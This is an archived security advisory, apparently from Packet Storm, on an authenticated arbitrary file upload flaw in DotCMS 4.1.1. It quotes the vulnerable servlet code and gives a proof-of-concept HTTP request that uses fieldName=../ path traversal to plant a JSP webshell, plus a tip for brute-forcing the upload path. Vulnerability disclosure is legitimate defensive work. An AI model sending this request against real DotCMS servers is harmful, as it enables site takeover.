what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DotCMS 4.1.1 Shell Upload

DotCMS 4.1.1 Shell Upload
Posted Jul 17, 2017
Authored by Xiaotian Wang

DotCMS version 4.1.1 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | e4c3a573a9e295eb33e393e863f9b9d0de5b31c1e1cab1d466e26029dd1e2363

DotCMS 4.1.1 Shell Upload

Change Mirror Download
==========================
Advisory: DotCMS /servlets/ajax_file_upload Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity Security Lab
Email: xiaotian.wang@dbappsecurity.com.cn
Affected Version: 4.1.1 the latest version
==========================
Vulnerability Description
==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'DotCMS' program, DotCMS is widely used in many companies.

Vulnerable cgi: /dotcms_4.1.1_999999.jar!/com/dotmarketing/servlets/AjaxFileUploadServlet.class:

private void doFileUpload(HttpSession session, HttpServletRequest request, HttpServletResponse response)
throws IOException
{
String fieldName = null;
AjaxFileUploadListener listener = null;
try
{
String fileName = "";

listener = new AjaxFileUploadListener(request.getContentLength());
FileItemFactory factory = new MonitoredDiskFileItemFactory(listener);
fieldName = request.getParameter("fieldName");
Enumeration params = request.getParameterNames();
session.setAttribute("FILE_UPLOAD_STATS_" + fieldName, listener.getFileUploadStats());
ServletFileUpload upload = new ServletFileUpload(factory);

List items = upload.parseRequest(request);
boolean hasError = false;
this.isEmptyFile = false;

String userId = null;
if (UtilMethods.isSet(session.getAttribute("USER_ID")))
{
userId = (String)session.getAttribute("USER_ID");
User user = UserLocalManagerUtil.getUserById(userId);
if ((!UtilMethods.isSet(user)) || (!UtilMethods.isSet(user.getUserId()))) {
throw new Exception("Could not upload File. Invalid User");
}
}
else
{
throw new Exception("Could not upload File. Invalid User");
}
for (Iterator i = items.iterator(); i.hasNext();)
{
FileItem fileItem = (FileItem)i.next();
if (!fileItem.isFormField())
{
if (fileItem.getSize() == 0L) {
this.isEmptyFile = true;
}
if (fileItem.getName().contains(File.separator)) {
fileName = fileItem.getName().substring(fileItem
.getName().lastIndexOf(File.separator) + 1);
} else {
fileName = fileItem.getName();
}
fileName = ContentletUtil.sanitizeFileName(fileName);

File tempUserFolder = new File(APILocator.getFileAssetAPI().getRealAssetPathTmpBinary() + File.separator + userId + File.separator + fieldName);
if (!isValidPath(tempUserFolder.getCanonicalPath())) {
throw new IOException("Invalid fileName or Path");
}
if (!tempUserFolder.exists()) {
tempUserFolder.mkdirs();
}
File dest = new File(tempUserFolder.getAbsolutePath() + File.separator + fileName);
if (dest.exists()) {
dest.delete();
}
fileItem.write(dest);
fileItem.delete();
}
}
if (this.isEmptyFile) {
fileName = "";
}
if (!hasError) {
sendCompleteResponse(response, null);
} else {
sendCompleteResponse(response, "Could not process uploaded file. Please see log for details.");
}
}
catch (Exception e)
{
listener.error("error");
session.setAttribute("FILE_UPLOAD_STATS_" + fieldName, listener.getFileUploadStats());
sendCompleteResponse(response, e.getMessage());
e.printStackTrace();
}
}


tempUserFolder can be controlled through paramter 'fieldName', the upload data is not filtered and the uploaded path can be user-definedi1/4so attacker with the administrator authority can upload evil jsp webshell file to control the whole web site or even the web server.
==========================
POC && EXP
==========================
1. Login as administrator
2. POST /servlets/ajax_file_upload?fieldName=../ HTTP/1.1
Host: 192.168.1.204:8080
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------1234995635
Cookie: your own cookies
Connection: close
Content-Length: 138

----------1234995635
Content-Disposition: form-data; name="xxx"; filename="test.jsp"

<% out.print("test_for_fun!");%>
----------1234995635--

3. shell is : http://192.168.1.204:8080/assets/tmp_upload/test.jsp

Attension: In some other cases: 'filedName=' , then shell will be in 'assets/tmp_upload/dotcms.org.1/' like this:http://192.168.1.204:8080/assets/tmp_upload/dotcms.org.1/test.jsp , 'dotcms.org.1' is your userid, even if you do not know your userid, you can bruteforce the number behind ' dotcms.org.' .
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close